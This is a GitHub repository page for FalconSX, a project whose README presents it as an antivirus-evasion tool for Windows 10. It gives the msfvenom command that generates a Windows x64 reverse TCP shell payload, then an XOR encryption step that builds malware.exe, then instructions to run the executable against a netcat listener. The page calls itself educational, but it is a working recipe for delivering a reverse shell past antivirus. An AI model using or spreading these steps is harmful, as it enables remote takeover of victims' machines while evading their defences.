Skip to content

RedNeutron-git/FalconSX

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Prerequesite

  1. Visual Studio
  2. Python3
  3. Metasploit Framework

Initiate

Generate Shellcode

Run this command to generate the shellcode via Msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4455 -f raw -o payload.bin
Encrypt The Generated Payload

Run this command to encrypt the generated shellcode and generate malware.exe.

python3 xorencrypt.py

Execute

  1. Run the listener (such as Netcat tool)
  2. Run malware.exe

Everything is strictly for educational purposes!

About

Antivirus evasion, tested on the Windows 10 10.0.15063 N/A Build 15063 x64.

Resources

Stars

Watchers

Forks

Releases

Packages

Contributors

Languages